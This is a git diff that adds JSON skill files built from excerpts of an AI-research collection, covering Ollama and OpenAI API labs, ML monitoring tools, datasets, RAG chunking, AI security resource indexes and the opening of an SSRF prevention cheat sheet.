+ "- **Step 1**: You have access to labs and playgrounds in O'Reilly. Navigate to the following lab and maximize the terminal window: https://learning.oreilly.com/scenarios/ethical-hacking-active/9780137835720X003/",
+ "- **Step 2**: Install gorilla-cli using the command `pip3 install gorilla-cli`",
+ "",
+ "- **Step 3**: Start interacting with it. The following is an example of a prompt to learn how can you see your IP address in Linux:",
+ ""
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/labs/gorilla.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_615af34f1379.json b/skills/ai_research_615af34f1379.json
new file mode 100644
index 0000000..2985159
--- /dev/null
+++ b/skills/ai_research_615af34f1379.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_615af34f1379",
+ "category": "ai-research",
+ "title": "model security testing",
+ "description": "## Model and GenAI Application Security Testing\n\nThis file is an entry point for **testing the security of AI/ML models and GenAI applications**. Use it together with:\n\n- `ai_security_tools.md` \u2013 curated list of offensive and defensive AI security tools.\n- `ai_risk_management/README.md` \u2013 governance, regulatory, and risk management frameworks.\n- `prompt_injection/README.md` \u2013 prompt injection, jailbreak techniques, and defenses.\n- `training_environment_security/README.md` \u2013 securing training and",
+ "payloads": [
+ "## Model and GenAI Application Security Testing",
+ "This file is an entry point for **testing the security of AI/ML models and GenAI applications**. Use it together with:",
+ "- `ai_security_tools.md` \u2013 curated list of offensive and defensive AI security tools.",
+ "- `ai_risk_management/README.md` \u2013 governance, regulatory, and risk management frameworks.",
+ "- `prompt_injection/README.md` \u2013 prompt injection, jailbreak techniques, and defenses.",
+ "- `training_environment_security/README.md` \u2013 securing training and fine\u2011tuning environments.",
+ "### 1. Core Guidance and Taxonomies",
+ "- [OWASP GenAI Security Project](https://genai.owasp.org/)",
+ "- **LLM Top 10 (2025)** \u2013 primary risk taxonomy for LLM and GenAI applications.",
+ "- **AI Security Landscape** and **Solutions Reference Guide (Q2\u2013Q3 2025)** \u2013 map risks to available controls.",
+ "- **Threat Defense COMPASS 1.0** \u2013 consolidated view of threats, vulnerabilities, defenses, and mitigations that can be used as a checklist for model/application testing.",
+ "- [OWASP AI Security and Privacy Guide](https://owasp.org/www-project-ai-security-and-privacy-guide/)",
+ "- [OWASP Machine Learning Security Top 10](https://mltop10.info/)",
+ "### 2. Risk Maps and Secure Design Patterns",
+ "- [Coalition for Secure AI (CoSAI)](https://github.com/cosai-oasis)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ai-research/model_security_testing.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_7089ae84bd6f.json b/skills/ai_research_7089ae84bd6f.json
new file mode 100644
index 0000000..ff1cff4
--- /dev/null
+++ b/skills/ai_research_7089ae84bd6f.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_7089ae84bd6f",
+ "category": "ai-research",
+ "title": "lab 06 tool calling",
+ "description": "# Lab 6: Tool Calling and Function Integration\n\n## Objective\nIn this lab, you will learn how to implement tool calling (function calling) with Ollama models. You'll create functions that models can invoke, handle tool responses, build agent loops, and create practical applications that extend model capabilities with external tools.\n\n## Prerequisites\n- Completed Labs 1-5\n- Python 3.8+ installed\n- Ollama Python library installed (`pip install ollama`)\n- Understanding of Python functions\n- A tool-c",
+ "payloads": [
+ "# Lab 6: Tool Calling and Function Integration",
+ "## Objective",
+ "In this lab, you will learn how to implement tool calling (function calling) with Ollama models. You'll create functions that models can invoke, handle tool responses, build agent loops, and create practical applications that extend model capabilities with external tools.",
+ "## Prerequisites",
+ "- Completed Labs 1-5",
+ "- Python 3.8+ installed",
+ "- Ollama Python library installed (`pip install ollama`)",
+ "- Understanding of Python functions",
+ "- A tool-capable model (e.g., `qwen3`, `llama3.2`)",
+ "## Estimated Time",
+ "90-120 minutes",
+ "## Part 1: Understanding Tool Calling",
+ "### What is Tool Calling?",
+ "Tool calling allows language models to invoke external functions and use their results to provide more accurate, up-to-date, or computed answers.",
+ "### Use Cases"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ollama-labs/lab-06-tool-calling.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_7a2a37b741e0.json b/skills/ai_research_7a2a37b741e0.json
new file mode 100644
index 0000000..55b6833
--- /dev/null
+++ b/skills/ai_research_7a2a37b741e0.json
@@ -0,0 +1,15 @@
+{
+ "id": "ai_research_7a2a37b741e0",
+ "category": "ai-research",
+ "title": "cheat sheets",
+ "description": "# Several Resources and \"Cheat Sheets\"\n\n- [Choosing the right estimator](https://scikit-learn.org/stable/tutorial/machine_learning_map/index.html)\n- [Top Traditional Machine Learning Algorithms](https://s3.amazonaws.com/assets.datacamp.com/email/other/ML+Cheat+Sheet_2.pdf)\n",
+ "payloads": [
+ "# Several Resources and \"Cheat Sheets\"",
+ "- [Choosing the right estimator](https://scikit-learn.org/stable/tutorial/machine_learning_map/index.html)",
+ "- [Top Traditional Machine Learning Algorithms](https://s3.amazonaws.com/assets.datacamp.com/email/other/ML+Cheat+Sheet_2.pdf)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ML-Fundamentals/cheat_sheets.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_7cf5ea1f040f.json b/skills/ai_research_7cf5ea1f040f.json
new file mode 100644
index 0000000..1c5491b
--- /dev/null
+++ b/skills/ai_research_7cf5ea1f040f.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_7cf5ea1f040f",
+ "category": "ai-research",
+ "title": "monitoring",
+ "description": "# AI Monitoring and Observability Tools\n\nThis file summarizes tools and frameworks for monitoring **models**, **data**, and **LLM/GenAI applications**, and connects them to modern guidance such as the OWASP GenAI Security Project and CoSAI.\n\n## 1. Model Monitoring Tools\n\n- [MLflow](https://mlflow.org/)\n- [TensorFlow Extended (TFX)](https://www.tensorflow.org/tfx)\n- [Seldon](https://www.seldon.io/)\n\n## 2. Data Quality Tools\n\n- [Great Expectations](https://greatexpectations.io/)\n- [Deequ](https://",
+ "payloads": [
+ "# AI Monitoring and Observability Tools",
+ "This file summarizes tools and frameworks for monitoring **models**, **data**, and **LLM/GenAI applications**, and connects them to modern guidance such as the OWASP GenAI Security Project and CoSAI.",
+ "## 1. Model Monitoring Tools",
+ "- [MLflow](https://mlflow.org/)",
+ "- [TensorFlow Extended (TFX)](https://www.tensorflow.org/tfx)",
+ "- [Seldon](https://www.seldon.io/)",
+ "## 2. Data Quality Tools",
+ "- [Great Expectations](https://greatexpectations.io/)",
+ "- [Deequ](https://github.com/awslabs/deequ)",
+ "## 3. Explainability and Interpretability Tools",
+ "- [SHAP (SHapley Additive exPlanations)](https://shap.readthedocs.io/en/latest/)",
+ "- [LIME (Local Interpretable Model-agnostic Explanations)](https://github.com/marcotcr/lime)",
+ "## 4. Ethical and Bias Monitoring Tools",
+ "- [IBM's AI Fairness 360](https://www.ibm.com/opensource/open/projects/ai-fairness-360/)",
+ "- [Google's What-If Tool](https://pair-code.github.io/what-if-tool/)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ai-research/monitoring.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_806c08748b28.json b/skills/ai_research_806c08748b28.json
new file mode 100644
index 0000000..47a7e1a
--- /dev/null
+++ b/skills/ai_research_806c08748b28.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_806c08748b28",
+ "category": "ai-research",
+ "title": "ml ai datasets",
+ "description": "# Datasets for AI / ML Research\n\n1. **UCI Machine Learning Repository**: A collection of databases, domain theories, and data generators widely used by the machine learning community.\n Website: [UCI ML Repository](https://archive.ics.uci.edu/ml/index.php)\n \n2. **Kaggle Datasets**: Offers a wide variety of datasets in different domains including economics, biology, computer vision, and natural language processing.\n Website: [Kaggle](https://www.kaggle.com/datasets)\n \n3. **AWS Public Datas",
+ "payloads": [
+ "# Datasets for AI / ML Research",
+ "1. **UCI Machine Learning Repository**: A collection of databases, domain theories, and data generators widely used by the machine learning community.",
+ "Website: [UCI ML Repository](https://archive.ics.uci.edu/ml/index.php)",
+ "2. **Kaggle Datasets**: Offers a wide variety of datasets in different domains including economics, biology, computer vision, and natural language processing.",
+ "Website: [Kaggle](https://www.kaggle.com/datasets)",
+ "3. **AWS Public Datasets**: Amazon Web Services offers a variety of public datasets that anyone can access.",
+ "Website: [AWS Public Datasets](https://registry.opendata.aws/)",
+ "4. **Google Dataset Search**: A tool that enables the discovery of datasets stored across the web.",
+ "Website: [Google Dataset Search](https://datasetsearch.research.google.com/)",
+ "5. **Microsoft Research Open Data**: A collection of free datasets from Microsoft Research to advance state-of-the-art research in areas such as natural language processing, computer vision, and domain-specific sciences.",
+ "Website: [Microsoft Research Open Data](https://msropendata.com/)",
+ "6. **OpenML**: An online platform for collaborative machine learning - easily share data, models, and experiments.",
+ "Website: [OpenML](https://www.openml.org/)",
+ "7. **Data.gov**: The home of the U.S. Government\u2019s open data, providing data, tools, and resources.",
+ "Website: [Data.gov](https://www.data.gov/)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ML-Fundamentals/ml_ai_datasets.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_84387587e0c7.json b/skills/ai_research_84387587e0c7.json
new file mode 100644
index 0000000..e6acce1
--- /dev/null
+++ b/skills/ai_research_84387587e0c7.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_84387587e0c7",
+ "category": "ai-research",
+ "title": "lab 03 rest api",
+ "description": "# Lab 3: Using the Ollama REST API\n\n## Objective\nIn this lab, you will learn how to interact with Ollama using its REST API. You'll make HTTP requests using curl and learn how to integrate Ollama into applications through API calls. This is essential for building applications that use local LLMs.\n\n## Prerequisites\n- Completed Lab 1 and Lab 2\n- Ollama installed and running\n- At least one model downloaded (e.g., `gemma3`)\n- Basic understanding of HTTP and REST APIs\n- `curl` installed (usually pre-",
+ "payloads": [
+ "# Lab 3: Using the Ollama REST API",
+ "## Objective",
+ "In this lab, you will learn how to interact with Ollama using its REST API. You'll make HTTP requests using curl and learn how to integrate Ollama into applications through API calls. This is essential for building applications that use local LLMs.",
+ "## Prerequisites",
+ "- Completed Lab 1 and Lab 2",
+ "- Ollama installed and running",
+ "- At least one model downloaded (e.g., `gemma3`)",
+ "- Basic understanding of HTTP and REST APIs",
+ "- `curl` installed (usually pre-installed on macOS/Linux)",
+ "- Basic understanding of JSON",
+ "## Estimated Time",
+ "60-75 minutes",
+ "## Part 1: Understanding the API",
+ "### Step 1: Verify Ollama Service is Running",
+ "Ollama runs a local API server on port 11434 by default. Verify it's running:"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ollama-labs/lab-03-rest-api.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_8a6ebfd8747c.json b/skills/ai_research_8a6ebfd8747c.json
new file mode 100644
index 0000000..d3b085a
--- /dev/null
+++ b/skills/ai_research_8a6ebfd8747c.json
@@ -0,0 +1,21 @@
+{
+ "id": "ai_research_8a6ebfd8747c",
+ "category": "ai-research",
+ "title": "ai agentic tools for cybersecurity",
+ "description": "# AI Agentic Tools for Cybersecurity\n\nSee my blog post [AI Agentic Cybersecurity Tools: Reaper, TARS, Fabric Agent Action, and Floki](https://becomingahacker.org/agentic-cybersecurity-tools-122374ce942b) for more details.\n\n## Tools\n\n\n| **Tool** | **Short Description** |\n|-----------------------|---------------------------------------------------------",
+ "payloads": [
+ "# AI Agentic Tools for Cybersecurity",
+ "See my blog post [AI Agentic Cybersecurity Tools: Reaper, TARS, Fabric Agent Action, and Floki](https://becomingahacker.org/agentic-cybersecurity-tools-122374ce942b) for more details.",
+ "## Tools",
+ "| **Tool** | **Short Description** |",
+ "|-----------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|",
+ "| [**Reaper**](https://github.com/ghostsecurity/reaper) | An AI-augmented web application security testing tool that combines recon, fuzzing, and vulnerability validation in a unified testing framework. |",
+ "| [**TARS**](https://github.com/osgil-defense/TARS) | An AI-powered penetration testing automation platform that orchestrates multiple pentest tools through an LLM-based decision-making agent. |",
+ "| [**Fabric Agent Action**](https://github.com/xvnpw/fabric-agent-action) | A GitHub Action that integrates the Fabric framework to automate CI/CD workflows using AI-driven patterns for tasks like issue summarization and PR reviews. |",
+ "| [**Floki**](https://github.com/Cyb3rWard0g/floki) | A framework for building and orchestrating LLM-powered autonomous agents, leveraging Dapr to enable robust multi-agent collaboration for cybersecurity tasks. |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ai_agentic_tools_for_cybersecurity.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_8e82dc74c985.json b/skills/ai_research_8e82dc74c985.json
new file mode 100644
index 0000000..b54685f
--- /dev/null
+++ b/skills/ai_research_8e82dc74c985.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_8e82dc74c985",
+ "category": "ai-research",
+ "title": "monitoring",
+ "description": "# AI monitoring tools\n\n1. **Model Monitoring Tools**\n - [MLflow](https://mlflow.org/)\n - [TensorFlow Extended (TFX)](https://www.tensorflow.org/tfx)\n - [Seldon](https://www.seldon.io/)\n\n2. **Data Quality Tools**\n - [Great Expectations](https://greatexpectations.io/)\n - [Deequ](https://github.com/awslabs/deequ)\n\n3. **Explainability and Interpretability Tools**\n - [SHAP (SHapley Additive exPlanations)](https://shap.readthedocs.io/en/latest/)\n - [LIME (Local Interpretable Model-agnost",
+ "payloads": [
+ "# AI monitoring tools",
+ "1. **Model Monitoring Tools**",
+ "- [MLflow](https://mlflow.org/)",
+ "- [TensorFlow Extended (TFX)](https://www.tensorflow.org/tfx)",
+ "- [Seldon](https://www.seldon.io/)",
+ "2. **Data Quality Tools**",
+ "- [Great Expectations](https://greatexpectations.io/)",
+ "- [Deequ](https://github.com/awslabs/deequ)",
+ "3. **Explainability and Interpretability Tools**",
+ "- [SHAP (SHapley Additive exPlanations)](https://shap.readthedocs.io/en/latest/)",
+ "- [LIME (Local Interpretable Model-agnostic Explanations)](https://github.com/marcotcr/lime)",
+ "4. **Ethical and Bias Monitoring Tools**",
+ "- [IBM's AI Fairness 360](https://www.ibm.com/opensource/open/projects/ai-fairness-360/)",
+ "- [Google's What-If Tool](https://pair-code.github.io/what-if-tool/)",
+ "5. **Performance Monitoring Tools**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/monitoring.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_95508ecda010.json b/skills/ai_research_95508ecda010.json
new file mode 100644
index 0000000..f7c7532
--- /dev/null
+++ b/skills/ai_research_95508ecda010.json
@@ -0,0 +1,15 @@
+{
+ "id": "ai_research_95508ecda010",
+ "category": "ai-research",
+ "title": "model security testing",
+ "description": "Please see https://github.com/The-Art-of-Hacking/h4cker/blob/master/ai-research/ai_security_tools.md\n\n### Julia Adversarial ML Frameworks\n\n- **[Mirage](https://github.com/bad-antics/mirage)** - Adversarial machine learning framework in Julia. Implements evasion attacks (FGSM, PGD, C&W), model extraction, membership inference, and robustness testing. Includes defenses like adversarial training and certified robustness. 7,000+ lines of Julia code.\n",
+ "payloads": [
+ "Please see https://github.com/The-Art-of-Hacking/h4cker/blob/master/ai-research/ai_security_tools.md",
+ "### Julia Adversarial ML Frameworks",
+ "- **[Mirage](https://github.com/bad-antics/mirage)** - Adversarial machine learning framework in Julia. Implements evasion attacks (FGSM, PGD, C&W), model extraction, membership inference, and robustness testing. Includes defenses like adversarial training and certified robustness. 7,000+ lines of Julia code."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/model_security_testing.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_96ebd14c00d9.json b/skills/ai_research_96ebd14c00d9.json
new file mode 100644
index 0000000..886e2a4
--- /dev/null
+++ b/skills/ai_research_96ebd14c00d9.json
@@ -0,0 +1,24 @@
+{
+ "id": "ai_research_96ebd14c00d9",
+ "category": "ai-research",
+ "title": "vector databases",
+ "description": "# Introduction to Vector Databases\n\nVector databases are specialized systems designed to store, retrieve, and search high-dimensional vector embeddings efficiently. These databases are great for applications that require similarity searches, such as recommendation engines, image recognition, and natural language processing. Unlike traditional databases, vector databases handle complex relationships within data by focusing on vector proximity or similarity rather than exact matches.\n\n### Examples",
+ "payloads": [
+ "# Introduction to Vector Databases",
+ "Vector databases are specialized systems designed to store, retrieve, and search high-dimensional vector embeddings efficiently. These databases are great for applications that require similarity searches, such as recommendation engines, image recognition, and natural language processing. Unlike traditional databases, vector databases handle complex relationships within data by focusing on vector proximity or similarity rather than exact matches.",
+ "### Examples of Vector Databases",
+ "- **[FAISS (Facebook AI Similarity Search)](https://github.com/facebookresearch/faiss)**",
+ "- **[ChromaDB](https://www.trychroma.com/)**",
+ "- **[Pinecone](https://www.pinecone.io/)**",
+ "- **[MongoDB Atlas Vector Search](https://www.mongodb.com/products/platform/atlas-vector-search)**",
+ "- **[Weaviate](https://weaviate.io/)**",
+ "- **[Qdrant](https://qdrant.tech/)**",
+ "- **[Milvus](https://milvus.io/)**",
+ "These databases provide the infrastructure needed to support advanced AI and machine learning applications by enabling efficient vector storage and retrieval.",
+ "I have several examples of vector databases, RAG, RAG Fusion, RAPTOR, as well as an overview of Searchable Encryption, Homomorphic Encryption, and Multiparty Computation in AI implementations in my blog at https://becomingahacker.org"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ML-Fundamentals/vector_databases.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_977d74c4358f.json b/skills/ai_research_977d74c4358f.json
new file mode 100644
index 0000000..a631e12
--- /dev/null
+++ b/skills/ai_research_977d74c4358f.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_977d74c4358f",
+ "category": "ai-research",
+ "title": "intro to LLM and SLMs",
+ "description": "# Introduction to LLMs and SLMs\nLarge Language Models (LLMs) have become super hot in the rapidly evolving field of artificial intelligence. This section compares LLMs and \n\n## Intro to LLMs\nLLMs are a type of artificial intelligence (AI) model that uses deep learning techniques. The most prevelant examples are transformer architectures. They are trained to recognize patterns in language, allowing them to predict and generate text that is coherent and contextually relevant. This capability disti",
+ "payloads": [
+ "# Introduction to LLMs and SLMs",
+ "Large Language Models (LLMs) have become super hot in the rapidly evolving field of artificial intelligence. This section compares LLMs and",
+ "## Intro to LLMs",
+ "LLMs are a type of artificial intelligence (AI) model that uses deep learning techniques. The most prevelant examples are transformer architectures. They are trained to recognize patterns in language, allowing them to predict and generate text that is coherent and contextually relevant. This capability distinguishes them from traditional machine learning models, which typically handle structured data like numerical or tabular information.",
+ "### Applications and Impact",
+ "- Conversational AI: LLMs are integral to developing conversational systems that interact with humans naturally. They enhance natural language understanding (NLU) and generation (NLG), enabling more intuitive and context-aware interactions.",
+ "- Information Retrieval and Text Analysis: LLMs can efficiently sift through large volumes of text to extract relevant information, summarize content, and perform complex analysis.",
+ "- Creative and Content Generation: These models can produce creative content, such as stories, articles, images, audio, etc. Combining text with audiovisual data could enable LLMs to understand and generate content across multiple formats, broadening their applicability",
+ "## Transformer Architecture",
+ "Transformers use self-attention to weigh the significance of different words in a sentence relative to each other. This mechanism allows the model to focus on relevant parts of the input sequence, enabling it to capture long-range dependencies and contextual information more effectively than previous models like recurrent neural networks (RNNs) and convolutional neural networks (CNNs).",
+ "Unlike RNNs, which process data sequentially, transformers can process input sequences in parallel.",
+ "The [paper \"Attention Is All You Need\"](https://arxiv.org/pdf/1706.03762) introduces the concept of transformer models which are the types of AI models that fuel ChatGPT, Claude, Mistral, Llama, and thousands of other models that you can find in [HuggingFace](https://huggingface.co/models).",
+ "## LLMs vs SLMs",
+ "LLMs are super popular after the introduction of ChatGPT years ago. However, Small Language Models (SLMs) are also becoming very popular.",
+ "Due to their size, LLMs require substantial computational resources for training and inference, often involving specialized hardware like GPUs or TPUs. This makes them costly to deploy and maintain. SLMs have lower computational requirements and can be run on local machines with less powerful hardware. This makes them more accessible and cost-effective for smaller organizations or specific applications."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ML-Fundamentals/intro_to_LLM_and_SLMs.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_9f1c5f4e6385.json b/skills/ai_research_9f1c5f4e6385.json
new file mode 100644
index 0000000..8fea233
--- /dev/null
+++ b/skills/ai_research_9f1c5f4e6385.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_9f1c5f4e6385",
+ "category": "ai-research",
+ "title": "basic openai api",
+ "description": "# Using the OpenAI API with Python \n\n### Step 1: Setting Up the Environment\n\n1. **Install Python**: Make sure you have Python 3.x installed. You can download it from the [official website](https://www.python.org/).\n2. **Set Up a Virtual Environment** (optional but recommended):\n ```bash\n python3 -m venv openai-lab-env\n source openai-lab-env/bin/activate # On Windows, use `openai-lab-env\\Scripts\\activate`\n ```\n3. **Install Necessary Packages**:\n ```bash\n pip3 install openai requests\n",
+ "payloads": [
+ "# Using the OpenAI API with Python",
+ "### Step 1: Setting Up the Environment",
+ "1. **Install Python**: Make sure you have Python 3.x installed. You can download it from the [official website](https://www.python.org/).",
+ "2. **Set Up a Virtual Environment** (optional but recommended):",
+ "```bash",
+ "python3 -m venv openai-lab-env",
+ "source openai-lab-env/bin/activate # On Windows, use `openai-lab-env\\Scripts\\activate`",
+ "3. **Install Necessary Packages**:",
+ "```bash",
+ "pip3 install openai requests",
+ "### Step 2: Configuring API Credentials",
+ "4. **Register on OpenAI**:",
+ "- Go to the [OpenAI website](https://www.openai.com/) and register to obtain API credentials.",
+ "5. **Configure API Credentials**:",
+ "- Store your API credentials securely, possibly using environment variables. In your terminal, you can set it up using the following command (replace `your_api_key_here` with your actual API key):"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/labs/basic_openai_api.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_9fc63f6989c2.json b/skills/ai_research_9fc63f6989c2.json
new file mode 100644
index 0000000..2c4aca1
--- /dev/null
+++ b/skills/ai_research_9fc63f6989c2.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_9fc63f6989c2",
+ "category": "ai-research",
+ "title": "example article",
+ "description": "# Server-Side Request Forgery Prevention Cheat Sheet\n\n## Introduction\nThe objective of the cheat sheet is to provide advice regarding the protection against Server-Side Request Forgery (SSRF) attacks.\n\nThis cheat sheet will focus on the defensive point of view and will not explain how to perform this attack. [This talk](https://www.slideshare.net/OrangeTsai/ssrf-attacks) by security researcher Orange Tsai, as well as [this document](https://docs.google.com/document/d/1V96Uw1VeHGRirvNw9QfZJTrzwLf",
+ "payloads": [
+ "# Server-Side Request Forgery Prevention Cheat Sheet",
+ "## Introduction",
+ "The objective of the cheat sheet is to provide advice regarding the protection against Server-Side Request Forgery (SSRF) attacks.",
+ "This cheat sheet will focus on the defensive point of view and will not explain how to perform this attack. [This talk](https://www.slideshare.net/OrangeTsai/ssrf-attacks) by security researcher Orange Tsai, as well as [this document](https://docs.google.com/document/d/1V96Uw1VeHGRirvNw9QfZJTrzwLf28yJOl6PMD0SxHRg), provide techniques on how to perform this kind of attack.",
+ "## Context",
+ "SSRF is an attack vector that abuses an application to interact with the internal/external network or the machine itself. One of the enablers for this vector is the mishandling of URLs, as showcased in the following examples:",
+ "- Image on an external server (e.g., user enters image URL of their avatar for the application to download and use).",
+ "- Custom WebHook (users have to specify Webhook handlers or Callback URLs).",
+ "- Internal requests to interact with another service to serve a specific functionality. Most of the time, user data is sent along to be processed, and if poorly handled, can perform specific injection attacks.",
+ "## Overview of a SSRF Common Flow",
+ "SSRF Common Flow",
+ "**Notes:**",
+ "- SSRF is not limited to the HTTP protocol. Generally, the first request is HTTP, but in cases where the application itself performs the second request, it could use different protocols (e.g., FTP, SMB, SMTP, etc.) and schemes (e.g., `file://`, `phar://`, `gopher://`, `data://`, `dict://`, etc.).",
+ "- If the application is vulnerable to XML eXternal Entity (XXE) injection, it can be exploited to perform an SSRF attack. Take a look at the [XXE cheat sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) to learn how to prevent exposure to XXE.",
+ "## Cases"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/RAG/example_article.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_a2976278f15a.json b/skills/ai_research_a2976278f15a.json
new file mode 100644
index 0000000..aa546b0
--- /dev/null
+++ b/skills/ai_research_a2976278f15a.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_a2976278f15a",
+ "category": "ai-research",
+ "title": "detecting ai",
+ "description": "# Detecting AI Usage Within a Company: Strategies and Best Practices\n\n## Overview\nAs AI adoption accelerates across enterprises, organizations need comprehensive strategies to detect, monitor, and govern AI usage. This includes both sanctioned AI tools and \"shadow AI\" - unauthorized AI applications that employees may be using without IT oversight.\n\n## Comprehensive AI Inventory and Discovery\n\n### Initial Assessment\nYou should always perform a comprehensive inventory of existing AI tools and appl",
+ "payloads": [
+ "# Detecting AI Usage Within a Company: Strategies and Best Practices",
+ "## Overview",
+ "As AI adoption accelerates across enterprises, organizations need comprehensive strategies to detect, monitor, and govern AI usage. This includes both sanctioned AI tools and \"shadow AI\" - unauthorized AI applications that employees may be using without IT oversight.",
+ "## Comprehensive AI Inventory and Discovery",
+ "### Initial Assessment",
+ "You should always perform a comprehensive inventory of existing AI tools and applications within the company. This involves:",
+ "- **Departmental Engagement**: Identify AI tools across all departments:",
+ "- Customer service (chatbots, sentiment analysis)",
+ "- Marketing (predictive analytics, content generation)",
+ "- HR (resume screening, candidate matching)",
+ "- Finance (fraud detection, automated accounting)",
+ "- Sales (lead scoring, CRM automation)",
+ "- IT/Security (threat detection, log analysis)",
+ "- Legal (contract analysis, compliance monitoring)",
+ "- **License and Subscription Audit**: Review software licenses and subscriptions for AI-related tools"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ai-risk-management/detecting_ai.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_a50414c258d8.json b/skills/ai_research_a50414c258d8.json
new file mode 100644
index 0000000..964a5e1
--- /dev/null
+++ b/skills/ai_research_a50414c258d8.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_a50414c258d8",
+ "category": "ai-research",
+ "title": "chunking",
+ "description": "# What is Chunking?\n\n**Chunking is the process of breaking down large documents or long pieces of text into smaller, more manageable segments, or \"chunks.\"** This is a fundamental step in preparing your knowledge base for a RAG system.\n\nWhy do we do this? Imagine trying to find a specific sentence in an entire book without an index. Now imagine finding it if the book was already broken down into chapters, then sections, and then paragraphs. Chunking does precisely that for your RAG system.\n\n---\n",
+ "payloads": [
+ "# What is Chunking?",
+ "**Chunking is the process of breaking down large documents or long pieces of text into smaller, more manageable segments, or \"chunks.\"** This is a fundamental step in preparing your knowledge base for a RAG system.",
+ "Why do we do this? Imagine trying to find a specific sentence in an entire book without an index. Now imagine finding it if the book was already broken down into chapters, then sections, and then paragraphs. Chunking does precisely that for your RAG system.",
+ "## Why is Chunking Essential for RAG?",
+ "Chunking isn't just a best practice; it's a necessity for several key reasons:",
+ "* **LLM Context Window Limitations**: Large Language Models have a finite **context window**, which is the maximum amount of text they can process at one time. If you try to feed an entire long document into an LLM, it will quickly exceed this limit, leading to truncated input and potentially missed information. Chunking ensures that the retrieved information fits within the LLM's capacity.",
+ "* **Improved Relevance of Embeddings**: When you generate an embedding for a very long document, the embedding can become \"diluted.\" It tries to capture the meaning of *everything* in the document, making it less specific to any single point. Smaller, more focused chunks lead to **more precise and relevant embeddings**. This means that when a user asks a specific question, the similarity search is more likely to retrieve highly relevant chunks rather than broad, less useful documents.",
+ "* **Reduced Noise**: If an LLM receives an entire long document, it has to sift through a lot of irrelevant information to find the answer. Smaller chunks reduce this \"noise,\" allowing the LLM to focus on the truly pertinent details from the retrieved context. This can lead to more accurate and concise answers.",
+ "* **Cost-Effectiveness**: Processing fewer tokens (from smaller chunks) generally translates to lower computational costs when interacting with LLMs, especially with API-based models.",
+ "## Key Considerations for Chunking",
+ "When designing your chunking strategy, there are several factors to consider:",
+ "* **Chunk Size**: This is arguably the most critical parameter.",
+ "* **Too small**: Chunks might lack sufficient context to answer a question. For example, a single sentence might not make sense without its preceding or following sentences.",
+ "* **Too large**: Chunks might exceed the LLM's context window, or contain too much irrelevant information, diluting the embedding.",
+ "* **Optimal size**: Often depends on the domain and the nature of your documents. A common starting point is between **200 to 500 tokens** (or characters), often with some overlap."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/RAG/chunking.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_ac8bc388b367.json b/skills/ai_research_ac8bc388b367.json
new file mode 100644
index 0000000..cde735f
--- /dev/null
+++ b/skills/ai_research_ac8bc388b367.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_ac8bc388b367",
+ "category": "ai-research",
+ "title": "lab 05 modelfiles",
+ "description": "# Lab 5: Creating Custom Models with Modelfiles\n\n## Objective\nIn this lab, you will learn how to create custom models using Modelfiles. You'll customize system prompts, adjust parameters, set templates, and create specialized models for specific tasks. This allows you to tailor models to your exact needs.\n\n## Prerequisites\n- Completed Labs 1-4\n- Ollama installed and running\n- At least one base model downloaded (e.g., `gemma3`, `llama3.2`)\n- Text editor for creating Modelfiles\n- Basic understandi",
